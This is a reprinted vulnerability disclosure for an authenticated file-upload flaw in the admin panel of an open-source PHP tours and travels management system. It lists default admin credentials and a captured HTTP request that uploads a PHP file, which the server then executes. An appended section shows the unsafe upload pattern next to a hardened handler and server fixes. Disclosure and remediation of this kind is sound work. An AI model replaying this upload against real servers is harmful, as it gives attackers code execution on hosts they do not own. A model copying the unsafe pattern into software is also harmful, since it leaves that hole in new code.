Online Tours & Travels Management System ab.php unrestricted file upload (authenticated, leads to remote code execution)

Vendor: https://www.sourcecodester.com/php/14510/onlinetourstravelsmanagementsystemprojectusingphpandmysql.htm

Login account: mayuri.infospace@gmail.com / admin (Super Admin account; the upload below requires this authenticated session)
Vulnerable page: http://<ip>/tour/admin/ab.php (the upload form on this page submits to admin/operations/aa.php, which stores the file without validating its name or content)


Upload request captured from the browser while logged in as Super Admin (field name "img", filename 123.php, body is a one-line PHP payload):

POST /OTMSP-Final-source-code/sourcecode/tour/admin/operations/aa.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------2293274527734505501588775325
Content-Length: 357
Origin: http://localhost
Connection: close
Referer: http://localhost/OTMSP-Final-source-code/sourcecode/tour/admin/ab.php
Cookie: PHPSESSID=orctgl8jtqmkpcvehrbapg6po2
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------2293274527734505501588775325
Content-Disposition: form-data; name="img"; filename="123.php"
Content-Type: application/octet-stream

<?php phpinfo(); ?>
-----------------------------2293274527734505501588775325
Content-Disposition: form-data; name="submit"


-----------------------------2293274527734505501588775325--


The uploaded file is written, under its original name 123.php, to the tour/admin/img directory (shown as "touradminimg" in the original), which is served by the web server.

Requesting the uploaded file in the browser shows that the PHP code was executed: the server rendered the phpinfo() output instead of returning the file as static content, so an attacker with the admin account can run arbitrary PHP on the host.
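The post does not show the source of operations/aa.php, so the following is an added example rather than the project's code: an illustrative reconstruction of the unsafe pattern this writeup exploits (client-supplied filename moved straight into a web-served directory), beside a hardened handler that ignores the client filename, allow-lists the extension and the sniffed MIME type, and stores under a random name. The field name "img" and the img/ target directory are taken from the captured request; everything else (function names, size limit, allowed types) is an assumption for illustration.

```php
<?php
// Added example, not code from the OTMS project. unsafeUpload() is an
// illustrative reconstruction of the pattern exploited above (the real aa.php
// is not shown in the post); safeUpload() is a hardened replacement.
// Field name "img" and the img/ directory follow the captured request.

declare(strict_types=1);

// Unsafe: trusts the client-supplied filename, so "123.php" lands in a
// web-served directory and is executed by PHP on the next GET.
function unsafeUpload(array $file, string $dir): string
{
    $dest = $dir . '/' . $file['name'];           // attacker controls name and extension
    move_uploaded_file($file['tmp_name'], $dest);
    return $dest;
}

// Allow-list: extension => MIME types that may appear for it.
const ALLOWED = [
    'jpg'  => ['image/jpeg'],
    'jpeg' => ['image/jpeg'],
    'png'  => ['image/png'],
    'gif'  => ['image/gif'],
];

// Hardened: reject anything that is not a parsable image of an allowed type,
// never reuse the client filename, and store under a random name.
function safeUpload(array $file, string $dir): string
{
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    if ($file['size'] > 2 * 1024 * 1024) {          // assumed 2 MiB limit
        throw new RuntimeException('file too large');
    }

    // Only the LAST extension segment is considered, so "x.php.jpg" is treated
    // as jpg; since the stored name is generated below, the client name never
    // reaches the filesystem anyway.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        throw new RuntimeException('extension not allowed');
    }

    // Sniff the real content. $_FILES['type'] is attacker-supplied and ignored.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!in_array($mime, ALLOWED[$ext], true)) {
        throw new RuntimeException('content does not match extension');
    }

    // Require a decodable image. This does not strip PHP hidden in image
    // metadata; what makes such payloads harmless is the allow-listed
    // extension plus a directory the web server will not execute scripts from.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a valid image');
    }

    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($dir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0644);
    return $name;   // persist this name in the database, not the client's
}

// How the handler would call it (assumed path; the form field is "img"):
// $stored = safeUpload($_FILES['img'], __DIR__ . '/../img');
```

Two server-side complements belong with this fix: the img/ directory should have PHP execution disabled (for Apache, a `php_flag engine off` or `RemoveHandler .php` in that directory's configuration; for nginx, no `location` passing that path to php-fpm), or the files should be stored outside the web root and served through a script. Either measure alone would have stopped the phpinfo() above from executing even with the original unvalidated upload.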


Original article: https://blog.csdn.net/Dwayne_Wade/article/details/129526901


Reprint source: http://www.7code.cn/show_37674.html
